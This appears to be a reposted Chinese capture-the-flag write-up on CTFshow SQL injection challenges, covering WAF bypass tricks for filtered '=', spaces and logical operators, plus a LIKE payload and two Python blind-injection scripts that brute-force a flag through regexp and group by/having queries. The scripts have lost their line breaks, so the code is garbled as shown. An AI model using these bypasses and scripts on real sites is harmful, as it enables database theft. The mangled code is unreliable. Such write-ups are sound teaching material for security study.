CTFSHOW sqll注入-编程知识

CTFSHOW sqll注入

=号过滤绕过

=号和不加通配符的 like 是一样的。
在这里插入图片描述
还可以使用 < >号来绕过，<> 在mysql中等于!= 如果在加一个! 双重否定代表肯定就是=了

空格过滤绕过

/**/ ，()，`，tab，两个空格

or and xor not 过滤绕过

and = && or = ||　　xor = | # 　　not = ！

1.模糊匹配：

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";//对传入的参数进行了过滤function waf($str){return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);}

利用模糊匹配：like就是SQL语句中的操作符，它的作用是指示在SQL语句后面的搜索模式是利用通配符而不是直接相等匹配进行比较。%（百分号），_（下划线）就是通配符，%表示任何字符出现任意次数(可以是0次)，_表示单个字符

'or%0cusername%0clike%0c'%fla%

2.正则匹配盲注

这样输入：tableName=`ctfshow_user`where`pass`regexp'ctfshow'where是并且的意思，也就是限制条件regexp是正则匹配而``这个反引号其实就是声明以下这是个表名或者这是个列名语句的意思是查询ctfshow_user这个表，并且pass这个列的内容是ctfshow

可以看到user_count=1这表示有一个内容匹配上了，进行盲注

import requestsurl='http://a688781a-293c-4944-badf-662710615fed.challenge.ctf.show/select-waf.php'flagstr='1234567890asdfghjklqwertyuiopzxcvbnm-_{}'
flag='ctfshow{'for i in range(50):for x in flagstr:data={'tableName':f"`ctfshow_user`where`pass`regexp'{flag+x}'"}res=requests.post(url=url,data=data)if res.text.find('user_count = 1;')>0:flag+=xprint('++++++++++++++++++++++++right:   '+x)breakelse:print('+++++++++++++++++wrong:  '+x)print(flag)#ctfshow{68264c64-1246-435b-bc1e-a80326290bb8}

3.过滤了一堆，将上一个payload对比下，过滤了where和' 把空格放出来了

//对传入的参数进行了过滤function waf($str){return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);}

having这个也可以用来查询，前置条件是需要用 group by

MySQL查询中having语句的使用场景和用法 - 知乎 (zhihu.com)

盲注脚本：

import requests
url='http://3d72fc66-90f6-4e34-a083-2171ceb1ea7c.challenge.ctf.show/select-waf.php'
flagstr='1234567890asdfghjklqwertyuiopzxcvbnm-_{}'
flag='ctfshow{'
def shiliu(x):st=''for i in x:st+=str(hex(ord(i)))st=st.replace('0x','')return '0x'+st
for i in range(50):for x in flagstr:data={'tableName':f"ctfshow_user group by pass having pass regexp({shiliu(flag+x)})"}res=requests.post(url=url,data=data)if res.text.find('$user_count = 1;') > 0:flag+=xprint('+++++++++++++right:    '+x)breakelse:print('++++++++++++woring:   '+x)print(flag)

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/216115.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！